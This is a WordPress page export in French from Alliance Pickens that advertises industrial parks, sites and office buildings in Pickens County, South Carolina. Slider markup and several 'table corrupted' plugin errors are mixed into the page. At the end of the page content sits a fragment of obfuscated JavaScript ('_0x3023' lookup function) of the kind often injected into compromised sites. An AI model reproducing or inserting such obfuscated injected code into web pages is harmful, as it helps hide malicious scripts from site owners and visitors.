{"id":8689,"date":"2020-10-28T16:08:34","date_gmt":"2020-10-28T16:08:34","guid":{"rendered":"http:\/\/alliancepickens.com\/sites-et-batiments\/"},"modified":"2020-12-04T20:12:42","modified_gmt":"2020-12-04T20:12:42","slug":"sites-et-batiments","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/","title":{"rendered":"Sites et b\u00e2timents"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;]\n\t\t\t<!-- START Alliance Pickens Property GFX REVOLUTION SLIDER 6.4.6 --><p class=\"rs-p-wp-fix\"><\/p>\n\t\t\t<rs-module-wrap id=\"rev_slider_3_1_wrapper\" data-source=\"gallery\" style=\"background:#FFFFFF;padding:0;margin:0px auto;margin-top:0;margin-bottom:0;max-width:;\">\n\t\t\t\t<rs-module id=\"rev_slider_3_1\" style=\"\" data-version=\"6.4.6\">\n\t\t\t\t\t<rs-slides>\n\t\t\t\t\t\t<rs-slide data-key=\"rs-11\" data-title=\"Seven Company\" data-duration=\"9700\" data-anim=\"ms:800ms;r:0;\" data-in=\"o:0;e:power1.inOut;\" data-out=\"e:power1.inOut;\" data-p1=\"B2B Services\" data-p3=\"View\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" src=\"\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/bg-placeholder.jpg\" alt=\"Mountain View\" title=\"Mountain View 5\" width=\"1920\" height=\"753\" class=\"rev-slidebg tp-rs-img\" data-no-retina>\n\t\t\t\t\t\t\t<rs-bgvideo \n\t\t\t\t\t\t\t\tdata-video=\"w:100%;h:100%;nse:false;l:true;ptimer:false;vfc:true;\"\n\t\t\t\t\t\t\t\tdata-mp4=\"\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/propertysearch-small.mp4\"\n\t\t\t\t\t\t\t><\/rs-bgvideo>\n<!--\n\t\t\t\t\t\t\t--><a\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-2\" \n\t\t\t\t\t\t\t\tclass=\"rs-layer rev-btn\"\n\t\t\t\t\t\t\t\thref=\"https:\/\/alliancepickens.giswebtechrecruit.com\/?sorting=featured%20desc,%20name%20asc&showpropertyonmap=true&mapextent=-9384113.706503402,4058819.237230376,-9030363.139599778,4227592.195683964\" target=\"_blank\" rel=\"nofollow noopener\"\n\t\t\t\t\t\t\t\tdata-type=\"button\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:542px,745px,609px,338px;yo:182px,250px,204px,113px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:32,44,36,20;l:50,68,55,30;fw:700;\"\n\t\t\t\t\t\t\t\tdata-dim=\"minh:0px,none,none,none;\"\n\t\t\t\t\t\t\t\tdata-padding=\"r:20,28,23,13;l:20,28,23,13;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tdata-frame_hover=\"bgc:#1d2e66;bor:0px,0px,0px,0px;sp:200;e:power1.inOut;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:8;background-color:#65c8ae;font-family:Open Sans;\"\n\t\t\t\t\t\t\t>Search Now \n\t\t\t\t\t\t\t<\/a><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-3\" \n\t\t\t\t\t\t\t\tdata-type=\"text\"\n\t\t\t\t\t\t\t\tdata-color=\"#1d2e66\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:48px,66px,54px,30px;yo:43px,59px,48px,26px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:24,33,27,15;l:25,34,27,15;ls:1px,1px,0px,0px;fw:600;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:12;font-family:Open Sans;text-transform:uppercase;\"\n\t\t\t\t\t\t\t>Property Search \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-4\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:35px,48px,39px,21px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:298px,409px,334px,185px;h:40px,55px,45px,25px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:11;background-color:#ffffff;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-5\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:46px,63px,51px,28px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:305px,419px,342px,190px;h:36px,49px,40px,22px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:10;background-color:#e8e8e8;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-6\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:26px,35px,28px,15px;yo:54px,74px,60px,33px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:281px,386px,315px,175px;h:36px,49px,40px,22px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:9;background-color:rgba(3,121,91,0.8);\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-3-slide-11-layer-7\" \n\t\t\t\t\t\t\t\tdata-type=\"shape\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"xo:184px,253px,207px,115px;yo:68px,93px,76px,42px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:20,27,22,12;l:0,34,27,15;\"\n\t\t\t\t\t\t\t\tdata-dim=\"w:100px,137px,112px,62px;h:2px,2px,1px,1px;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:13;background-color:#5dc9ae;\"\n\t\t\t\t\t\t\t> \n\t\t\t\t\t\t\t<\/rs-layer><!--\n-->\t\t\t\t\t\t<\/rs-slide>\n\t\t\t\t\t<\/rs-slides>\n\t\t\t\t\t<rs-static-layers><!--\n\t\t\t\t\t--><\/rs-static-layers>\n\t\t\t\t<\/rs-module>\n\t\t\t\t<script type=\"text\/javascript\">\n\t\t\t\t\tsetREVStartSize({c: 'rev_slider_3_1',rl:[1240,1024,778,480],el:[250,700,700,800],gw:[800,1100,900,500],gh:[250,508,415,231],type:'standard',justify:'',layout:'fullwidth',mh:\"0\"});\n\t\t\t\t\tvar\trevapi3,\n\t\t\t\t\t\ttpj;\n\t\t\t\t\tfunction revinit_revslider31() {\n\t\t\t\t\tjQuery(function() {\n\t\t\t\t\t\ttpj = jQuery;\n\t\t\t\t\t\trevapi3 = tpj(\"#rev_slider_3_1\");\n\t\t\t\t\t\tif(revapi3==undefined || revapi3.revolution == undefined){\n\t\t\t\t\t\t\trevslider_showDoubleJqueryError(\"rev_slider_3_1\");\n\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\trevapi3.revolution({\n\t\t\t\t\t\t\t\tvisibilityLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tgridwidth:\"800,1100,900,500\",\n\t\t\t\t\t\t\t\tgridheight:\"250,508,415,231\",\n\t\t\t\t\t\t\t\tspinner:\"spinner4\",\n\t\t\t\t\t\t\t\tperspective:600,\n\t\t\t\t\t\t\t\tperspectiveType:\"local\",\n\t\t\t\t\t\t\t\teditorheight:\"250,700,700,800\",\n\t\t\t\t\t\t\t\tresponsiveLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tprogressBar:{disableProgressBar:true},\n\t\t\t\t\t\t\t\tnavigation: {\n\t\t\t\t\t\t\t\t\tonHoverStop:false\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\tfallbacks: {\n\t\t\t\t\t\t\t\t\tallowHTML5AutoPlayOnAndroid:true\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t});\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t});\n\t\t\t\t\t} \/\/ End of RevInitScript\n\t\t\t\tvar once_revslider31 = false;\n\t\t\t\tif (document.readyState === \"loading\") {document.addEventListener('readystatechange',function() { if((document.readyState === \"interactive\" || document.readyState === \"complete\") && !once_revslider31 ) { once_revslider31 = true; revinit_revslider31();}});} else {once_revslider31 = true; revinit_revslider31();}\n\t\t\t\t<\/script>\n\t\t\t\t<script>\n\t\t\t\t\tvar htmlDivCss = unescape(\"%23rev_slider_3_1_wrapper%20rs-loader.spinner4%20div%20%7B%20background-color%3A%20%23ffffff%20%21important%3B%20%7D\");\n\t\t\t\t\tvar htmlDiv = document.getElementById('rs-plugin-settings-inline-css');\n\t\t\t\t\tif(htmlDiv) {\n\t\t\t\t\t\thtmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss;\n\t\t\t\t\t}else{\n\t\t\t\t\t\tvar htmlDiv = document.createElement('div');\n\t\t\t\t\t\thtmlDiv.innerHTML = '<style>' + htmlDivCss + '<\/style>';\n\t\t\t\t\t\tdocument.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]);\n\t\t\t\t\t}\n\t\t\t\t<\/script>\n\t\t\t<\/rs-module-wrap>\n\t\t\t<!-- END REVOLUTION SLIDER -->\n[\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Parcs industriels<\/h2>\n<p>[\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose d\u2019une infrastructure compl\u00e8te de services publics qui comprend 2 fournisseurs d\u2019\u00e9lectricit\u00e9, un commutateur de fibre d\u00e9di\u00e9, une capacit\u00e9 d\u2019eaux us\u00e9es suffisantes, la capacit\u00e9 d\u2019eau et un r\u00e9servoir de stockage d\u2019eau de 1 million de gallons qui est d\u00e9di\u00e9 \u00e0 l\u2019utilisation par les installations de Commerce Park.[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3><\/h3>\n<h3 style=\"text-align: center\">Les entreprises du parc commercial du comt\u00e9 de Pickens comprennent :<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Abbott<\/li>\n<li>era-contact Etats-Unis<\/li>\n<li>IPSUM Technologies<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>TECHNOLOGIES D\u2019automatisation JR<\/li>\n<li>KeyMark, Inc.<\/li>\n<li>Reliable Automatic Sprinkler Company<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Safeplast \u00c9tats-Unis<\/li>\n<li>Taylormade<\/li>\n<li>Outil et moule unis<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3 style=\"text-align: center\"><\/h3>\n<h3 style=\"text-align: center\">Pickens County Commerce Park Caract\u00e9ristiques comprennent:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Parc industriel de classe A<\/li>\n<li>Pactes de protection en place | <a href=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants-1.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Lire la suite<\/a><\/li>\n<li>Deux sous-stations \u00e9lectriques et deux fournisseurs d\u2019\u00e9lectricit\u00e9<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Commutateur de fibre num\u00e9rique sur place<\/li>\n<li>Infrastructure robuste en place<\/li>\n<li>Plus de 1,1 million de pieds carr\u00e9s de construction de b\u00e2timents<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Environnement semblable \u00e0 celui du campus<\/li>\n<li>Entre Charlotte, NC et Atlanta, GA<\/li>\n<li>Un site restant<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;fullbtn&#8221;]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/\">En savoir plus sur le Pickens County Commerce Park<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4765&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;industrial_sites&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Sites industriels<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]Alliance Pickens fournit une assistance \u00e0 la s\u00e9lection du site pour les entreprises qui envisagent Pickens County.South Carolina.USA. pour leur projet d\u2019expansion ou de relocalisation. L\u2019\u00e9quipe d\u2019Alliance Pickens offre une gamme de services cl\u00e9s, y compris l\u2019identification des sites potentiels, la coordination des visites, la tenue de demandes de renseignements confidentielles, la personnalisation des strat\u00e9gies de perfectionnement de la main-d\u2019\u0153uvre et la liaison avec les organismes gouvernementaux et le milieu des affaires local.<\/p>\n<p>Alliance Pickens travaille r\u00e9guli\u00e8rement avec des dirigeants d\u2019entreprise, des consultants en s\u00e9lection de sites et d\u2019autres parties impliqu\u00e9es dans le processus de s\u00e9lection du site afin d\u2019assurer un effort de collaboration qui tienne compte \u00e0 la fois des besoins imm\u00e9diats et \u00e0 long terme de votre organisation.<\/p>\n<p>Les exigences de l\u2019entreprise telles que la construction sur place, l\u2019infrastructure, l\u2019acc\u00e8s \u00e0 la fibre et d\u2019autres priorit\u00e9s commerciales sont utilis\u00e9es pour trouver l\u2019emplacement qui aidera votre projet \u00e0 r\u00e9ussir.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<span style=\"font-size: 12px\">Veuillez consulter les sites disponibles \u00e9num\u00e9r\u00e9s ci-dessous et <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact\">contactez-nous<\/a> pour obtenir de l\u2019aide suppl\u00e9mentaire.<\/span>[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c8\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;4915&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;industrial_buildings&#8221;][vc_column][vc_column_text]<\/p>\n<h2>B\u00e2timents industriels<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<span style=\"font-weight: 400\">Le personnel d\u2019Alliance Pickens est heureux de fournir la s\u00e9lection de b\u00e2timents industriels de la r\u00e9gion \u00e0 vendre ou \u00e0 louer pour trouver un emplacement qui r\u00e9pond \u00e0 vos besoins d\u2019affaires. Veuillez communiquer avec nous pour obtenir de l\u2019information sur les besoins connexes de votre entreprise, qu\u2019il s\u2019agit de permettre des pr\u00e9occupations ou de la disponibilit\u00e9 de la main-d\u2019\u0153uvre, afin de faciliter le processus de s\u00e9lection.<\/span><\/p>\n<p><span style=\"font-weight: 400\">Pour plus d\u2019informations sur ces propri\u00e9t\u00e9s ou d\u2019autres, s\u2019il vous <\/span> <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact\"><span style=\"font-weight: 400\">pla\u00eet contactez-nous<\/span><\/p>\n<p><\/a> <span style=\"font-weight: 400\"> pour obtenir de l\u2019aide suppl\u00e9mentaire.<\/span>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<div>Attention: The internal data of table \u201c9\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10703&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_id=&#8221;office_buildings&#8221;][vc_column][vc_column_text]<\/p>\n<h2>Immeubles de bureaux<\/h2>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]Alliance Pickens peut aider \u00e0 d\u00e9velopper ou \u00e0 relocaliser des entreprises pour identifier les propri\u00e9t\u00e9s appropri\u00e9es de b\u00e2timent de bureaux commerciaux \u00e0 vendre ou \u00e0 louer dans le comt\u00e9 de Pickens.South Carolina.USA.<\/p>\n<p>Pour en savoir plus sur les possibilit\u00e9s de zone, consultez notre liste de propri\u00e9t\u00e9s s\u00e9lectionn\u00e9es. Pour plus d\u2019informations sur ces biens et d\u2019autres immeubles de bureaux commerciaux disponibles \u00e0 vendre ou \u00e0 louer dans la r\u00e9gion de Pickens County.South Carolina.USA, veuillez <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact\">contacter Alliance Pickens<\/a>.[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<div>Attention: The internal data of table \u201c10\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">En savoir plus sur les sites et les b\u00e2timents<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;19&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h3>Nous sommes impatients de vous parler!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Parcs industriels [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8689","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sites et b\u00e2timents - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sites et b\u00e2timents - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Parcs industriels [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T20:12:42+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/\",\"name\":\"Sites et b\u00e2timents - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"datePublished\":\"2020-10-28T16:08:34+00:00\",\"dateModified\":\"2020-12-04T20:12:42+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sites et b\u00e2timents\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sites et b\u00e2timents - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/","og_locale":"fr_FR","og_type":"article","og_title":"Sites et b\u00e2timents - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;Dans cette section&#8221; nav_menu=&#8221;19&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text] Parcs industriels [\/vc_column_text][vc_empty_space][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;2\/3&#8243;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T20:12:42+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/","url":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/","name":"Sites et b\u00e2timents - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"datePublished":"2020-10-28T16:08:34+00:00","dateModified":"2020-12-04T20:12:42+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Sites et b\u00e2timents"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens 